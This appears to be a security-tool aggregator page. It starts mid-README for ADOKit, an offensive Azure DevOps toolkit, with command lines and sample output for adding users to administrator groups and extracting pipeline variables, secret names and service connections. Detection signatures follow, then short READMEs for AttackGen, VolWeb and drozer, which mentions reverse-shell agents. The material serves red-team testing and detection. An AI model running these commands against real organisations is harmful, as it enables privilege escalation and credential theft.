        [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/4/23 13:11:18 Finished execution of getpermissions

        Add Project Admin

        Use Case

        Add a user to the Project Administrators group for a given project.

        Syntax

        Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: addprojectadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 2:52:45 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        -------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 18:52:47 Finished execution of addprojectadmin

        Remove Project Admin

        Use Case

        Remove a user from the Project Administrators group for a given project.

        Syntax

        Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: removeprojectadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:19:43 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

        4/4/23 19:19:44 Finished execution of removeprojectadmin

        Add Build Admin

        Use Case

        Add a user to the Build Administrators group for a given project.

        Syntax

        Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: addbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:41:51 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        -------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
        [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 19:41:55 Finished execution of addbuildadmin

        Remove Build Admin

        Use Case

        Remove a user from the Build Administrators group for a given project.

        Syntax

        Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

        Example Output

        C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

        ==================================================
        Module: removebuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 3:42:10 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

        4/4/23 19:42:11 Finished execution of removebuildadmin

        Add Collection Admin

        Use Case

        Add a user to the Project Collection Administrators group.

        Syntax

        Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 4:04:40 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        -------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/4/23 20:04:43 Finished execution of addcollectionadmin

        Remove Collection Admin

        Use Case

        Remove a user from the Project Collection Administrators group.

        Syntax

        Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 4:10:35 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/4/23 20:10:38 Finished execution of removecollectionadmin

        Add Collection Build Admin

        Use Case

        Add a user to the Project Collection Build Administrators group.

        Syntax

        Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:21:39 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

        Remove Collection Build Admin

        Use Case

        Remove a user from the Project Collection Build Administrators group.

        Syntax

        Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionbuildadmin
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:21:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

        4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

        Add Collection Build Service Account

        Use Case

        Add a user to the Project Collection Build Service Accounts group.

        Syntax

        Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionbuildsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:22:13 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        ------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

        Remove Collection Build Service Account

        Use Case

        Remove a user from the Project Collection Build Service Accounts group.

        Syntax

        Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionbuildsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 8:22:27 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        ----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

        4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

        Add Collection Service Account

        Use Case

        Add a user to the Project Collection Service Accounts group.

        Syntax

        Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: addcollectionsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 11:21:01 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

        [+] SUCCESS: User successfully added

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
        [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

        4/5/23 15:21:04 Finished execution of addcollectionsvc

        Remove Collection Service Account

        Use Case

        Remove a user from the Project Collection Service Accounts group.

        Syntax

        Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

        ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

        ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

        Example Output

        C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

        ==================================================
        Module: removecollectionsvc
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/5/2023 11:21:43 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

        [+] SUCCESS: User successfully removed

        Group | Mail Address | Display Name
        -------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

        4/5/23 15:21:44 Finished execution of removecollectionsvc

        Get Pipeline Variables

        Use Case

        Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

        Syntax

        Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

        ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpipelinevars
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/6/2023 12:08:35 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Pipeline Var Name | Pipeline Var Value
        -----------------------------------------------------------------------------------
        credential | P@ssw0rd123!
        url | http://blah/

        4/6/23 16:08:36 Finished execution of getpipelinevars

        Get Pipeline Secrets

        Use Case

        Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

        Syntax

        Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

        ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpipelinesecrets
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/10/2023 10:28:37 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Build Secret Name | Build Secret Value
        -----------------------------------------------------
        anotherSecretPass | [HIDDEN]
        secretpass | [HIDDEN]

        4/10/23 14:28:38 Finished execution of getpipelinesecrets

        Get Service Connections

        Use Case

        List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

        Syntax

        Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

        ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

        ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

        ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

        Example Output

        C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getserviceconnections
        Auth Type: Cookie
        Project: maraudersmap
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/11/2023 8:34:16 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Connection Name | Connection Type | ID
        --------------------------------------------------------------------------------------------------------------------------------------------------
        Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
        Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
        Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
        Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

        4/11/23 12:34:16 Finished execution of getserviceconnections

        Detection

        Below are static signatures for the specific usage of this tool in its default state:

        • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
        • See ADOKit Yara Rule in this repo.
        • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
        • See ADOKit Snort Rule in this repo.
        • Microsoft Sentinel Rules
        • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
        • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

        For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

        Roadmap

        • Support for Azure DevOps Server

        References

        • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
        • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


        Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

        By: Zion3R


        AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


        Star the Repo

        If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

        Features

        • Generates unique incident response scenarios based on chosen threat actor groups.
        • Allows you to specify your organisation's size and industry for a tailored scenario.
        • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
        • Create custom scenarios based on a selection of ATT&CK techniques.
        • Capture user feedback on the quality of the generated scenarios.
        • Downloadable scenarios in Markdown format.
        • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
        • Available as a Docker container image for easy deployment.
        • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


        Releases

        v0.4 (current)

        What's new? Why is it useful?
        Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
        Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
        Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
        Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

        v0.3

        What's new? Why is it useful?
        Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

        - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
        LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

        - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
        Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
        Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

        v0.2

        What's new? Why is it useful?
        Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

        - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
        User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
        Improved error handling for missing API keys - Improved user experience.
        Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

        v0.1

        Initial release.

        Requirements

        • Recent version of Python.
        • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
        • OpenAI API key.
        • LangChain API key (optional) - see LangSmith Setup section below for further details.
        • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

        Installation

        Option 1: Cloning the Repository

        1. Clone this repository:
        git clone https://github.com/mrwadams/attackgen.git
        1. Change directory into the cloned repository:
        cd attackgen
        1. Install the required Python packages:
        pip install -r requirements.txt

        Option 2: Using Docker

        1. Pull the Docker container image from Docker Hub:
        docker pull mrwadams/attackgen

        LangSmith Setup

        If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

        If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

        Data Setup

        Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

        Running AttackGen

        After the data setup, you can run AttackGen with the following command:

        streamlit run πŸ‘‹_Welcome.py

        You can also try the app on Streamlit Community Cloud.

        Usage

        Running AttackGen

        Option 1: Running the Streamlit App Locally

        1. Run the Streamlit app:
        streamlit run πŸ‘‹_Welcome.py
        1. Open your web browser and navigate to the URL provided by Streamlit.
        2. Use the app to generate standard or custom incident response scenarios (see below for details).

        Option 2: Using the Docker Container Image

        1. Run the Docker container:
        docker run -p 8501:8501 mrwadams/attackgen

        This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

        Generating Scenarios

        Standard Scenario Generation

        1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
        2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
        3. Select your organisatin's industry and size from the dropdown menus.
        4. Navigate to the Threat Group Scenarios page.
        5. Select the Threat Actor Group that you want to simulate.
        6. Click on 'Generate Scenario' to create the incident response scenario.
        7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

        Custom Scenario Generation

        1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
        2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
        3. Select your organisation's industry and size from the dropdown menus.
        4. Navigate to the Custom Scenario page.
        5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
        6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
        7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

        Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

        Contributing

        I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

        Licence

        This project is licensed under GNU GPLv3.



        VolWeb - A Centralized And Enhanced Memory Analysis Platform

        By: Zion3R


        VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


        Objective

        The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

        By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

        Project Documentation and Getting Started Guide

        The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

        [!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

        Interacting with the REST API

        VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.

        Issues

        If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

        Contact

        Contact me at k1nd0ne@mail.com for any questions regarding this tool.

        Next Release Goals

        Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



        Drozer - The Leading Security Assessment Framework For Android

        By: Zion3R


        drozer (formerly Mercury) is the leading security testing framework for Android.

        drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

        drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

        drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

        drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


        Docker Container

        To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

